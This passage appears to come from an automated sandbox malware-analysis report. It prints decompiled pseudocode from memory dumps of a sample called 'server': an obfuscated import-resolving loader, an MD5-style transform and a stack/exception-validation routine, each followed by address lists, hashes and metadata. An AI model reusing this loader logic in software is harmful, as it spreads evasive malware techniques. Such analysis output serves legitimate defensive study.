				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x43175ac3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x43175a44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x43175ac3;
										}
										 *_v16 = _t55;
										_t58 = _t59 * 4 - 0xc5d6b08;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0xbce8a5bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401000
0x00401009
0x0040100e
0x00401014
0x0040101d
0x00401023
0x00401025
0x00401028
0x0040102d
0x00401034
0x00401034
0x00401038
0x0040103e
0x00401043
0x00000000
0x00000000
0x00401049
0x00401053
0x00401055
0x00401058
0x0040105b
0x0040105f
0x00401067
0x00401069
0x0040106c
0x004010d4
0x004010d4
0x004010d8
0x00000000
0x00000000
0x00401071
0x00401077
0x00401079
0x0040108c
0x0040108f
0x0040108f
0x0040108f
0x00401093
0x0040107b
0x0040107b
0x00401083
0x00401085
0x00000000
0x00000000
0x00000000
0x00000000
0x00401085
0x00401073
0x00401073
0x00401087
0x00401087
0x00401087
0x00401096
0x00401099
0x0040109b
0x004010a2
0x0040109d
0x0040109d
0x0040109d
0x004010aa
0x004010b0
0x004010b2
0x004010e2
0x004010b4
0x004010b4
0x004010b7
0x004010b9
0x004010c1
0x004010c1
0x004010c6
0x004010c8
0x004010cf
0x004010d1
0x004010d1
0x004010d1
0x00000000
0x004010d1
0x00000000
0x004010b2
0x00401061
0x00401061
0x00401065
0x00000000
0x00000000
0x00401065
0x004010e5
0x004010e5
0x004010ec
0x004010f1
0x00000000
0x00000000
0x004010f7
0x00401102
0x00000000
0x00401102
0x004010f9
0x004010f9
0x004010ff
0x00000000
0x004010ff
0x0040102d
0x00401103
0x00401108

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
GetProcAddress.KERNEL32(?,00000000), ref: 004010AA

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02BD16DF Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E02BD16DF(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x02bd16e2
0x02bd16ed
0x02bd16f0
0x02bd16f3
0x02bd16f4
0x02bd1712
0x02bd1714
0x02bd1717
0x02bd171a
0x02bd171a
0x02bd171d
0x02bd171d
0x02bd1720
0x02bd1720
0x02bd1723
0x02bd1723
0x02bd1740
0x02bd1743
0x02bd1759
0x02bd175c
0x02bd1776
0x02bd1779
0x02bd178f
0x02bd1792
0x02bd1794
0x02bd17ac
0x02bd17af
0x02bd17b2
0x02bd17ca
0x02bd17cd
0x02bd17e7
0x02bd17ea
0x02bd1800
0x02bd1803
0x02bd1805
0x02bd181d
0x02bd1822
0x02bd1825
0x02bd183b
0x02bd183e
0x02bd1858
0x02bd185b
0x02bd1871
0x02bd1874
0x02bd1876
0x02bd1891
0x02bd1894
0x02bd18ab
0x02bd18ae
0x02bd18b2
0x02bd18cb
0x02bd18ce
0x02bd18d0
0x02bd18d3
0x02bd18ee
0x02bd18f1
0x02bd190a
0x02bd190d
0x02bd191d
0x02bd1920
0x02bd1938
0x02bd193b
0x02bd1955
0x02bd1958
0x02bd1970
0x02bd1973
0x02bd1989
0x02bd198c
0x02bd19a4
0x02bd19a7
0x02bd19bf
0x02bd19c2
0x02bd19dc
0x02bd19df
0x02bd19f5
0x02bd19f8
0x02bd1a10
0x02bd1a13
0x02bd1a2d
0x02bd1a30
0x02bd1a48
0x02bd1a4b
0x02bd1a61
0x02bd1a64
0x02bd1a7c
0x02bd1a7f
0x02bd1a97
0x02bd1a9a
0x02bd1aac
0x02bd1aaf
0x02bd1ac1
0x02bd1ac4
0x02bd1ad6
0x02bd1ad9
0x02bd1add
0x02bd1aed
0x02bd1af0
0x02bd1afe
0x02bd1b01
0x02bd1b13
0x02bd1b16
0x02bd1b2a
0x02bd1b2d
0x02bd1b2f
0x02bd1b3f
0x02bd1b42
0x02bd1b54
0x02bd1b57
0x02bd1b65
0x02bd1b68
0x02bd1b7a
0x02bd1b7d
0x02bd1b81
0x02bd1b91
0x02bd1b94
0x02bd1ba6
0x02bd1ba9
0x02bd1bb7
0x02bd1bba
0x02bd1bcc
0x02bd1bcf
0x02bd1be1
0x02bd1be4
0x02bd1bf8
0x02bd1bfb
0x02bd1c0f
0x02bd1c12
0x02bd1c26
0x02bd1c29
0x02bd1c3d
0x02bd1c40
0x02bd1c54
0x02bd1c57
0x02bd1c6b
0x02bd1c70
0x02bd1c82
0x02bd1c85
0x02bd1c99
0x02bd1c9c
0x02bd1cb0
0x02bd1cb3
0x02bd1cc9
0x02bd1ccc
0x02bd1ce0
0x02bd1ce3
0x02bd1cf5
0x02bd1cf8
0x02bd1d0c
0x02bd1d0f
0x02bd1d23
0x02bd1d26
0x02bd1d3a
0x02bd1d43
0x02bd1d46
0x02bd1d4f
0x02bd1d58
0x02bd1d60
0x02bd1d68
0x02bd1d72
0x02bd1d87

APIs

memset.NTDLL ref: 02BD1D7B

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction ID: 4ba399f6db46f051f02c68140a876eb24c9f3177e53227775654226836366692
Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
Instruction Fuzzy Hash: DA22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD8551 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD8551(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2bda380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2bda3c8 = 1;
										__eflags =  *0x2bda3c8;
										if( *0x2bda3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x2bda380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2bda3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2bda380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2bda388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2bda384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2bda3c8 = 1;
							__eflags =  *0x2bda3c8;
							if( *0x2bda3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2bda3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2bda388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2bda380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2bda388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2bda388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x02bd855b
0x02bd855e
0x02bd8564
0x02bd8582
0x00000000
0x02bd8582
0x02bd856c
0x02bd8575
0x02bd857b
0x02bd858a
0x02bd858d
0x02bd8590
0x02bd859a
0x02bd859a
0x02bd859c
0x02bd859f
0x02bd85a1
0x02bd85a1
0x02bd85a3
0x02bd85a6
0x00000000
0x00000000
0x02bd85a8
0x02bd85aa
0x02bd8610
0x02bd8610
0x02bd876e
0x00000000
0x02bd876e
0x02bd85ac
0x02bd85ac
0x02bd85b0
0x02bd85b2
0x02bd85b2
0x02bd85b2
0x02bd85b2
0x02bd85b5
0x02bd85b6
0x02bd85b9
0x02bd85b9
0x02bd85bd
0x02bd85c1
0x02bd85cf
0x02bd85cf
0x02bd85d7
0x02bd85dd
0x02bd85df
0x02bd85e1
0x02bd85f1
0x02bd85fe
0x02bd8602
0x02bd8607
0x02bd8609
0x02bd8687
0x02bd8687
0x02bd860b
0x02bd860b
0x02bd860b
0x02bd8689
0x02bd868b
0x02bd876c
0x02bd876c
0x00000000
0x02bd8691
0x02bd8691
0x02bd8698
0x00000000
0x00000000
0x02bd869e
0x02bd86a2
0x02bd86fe
0x02bd8700
0x02bd8708
0x02bd870a
0x02bd870c
0x00000000
0x00000000
0x02bd870e
0x02bd8714
0x02bd8716
0x02bd8718
0x02bd872d
0x02bd872d
0x02bd872f
0x02bd875e
0x02bd8765
0x00000000
0x02bd8765
0x02bd8733
0x02bd8734
0x02bd8736
0x02bd8738
0x02bd8738
0x02bd873a
0x02bd873c
0x02bd873e
0x02bd8752
0x02bd8752
0x02bd8755
0x02bd8757
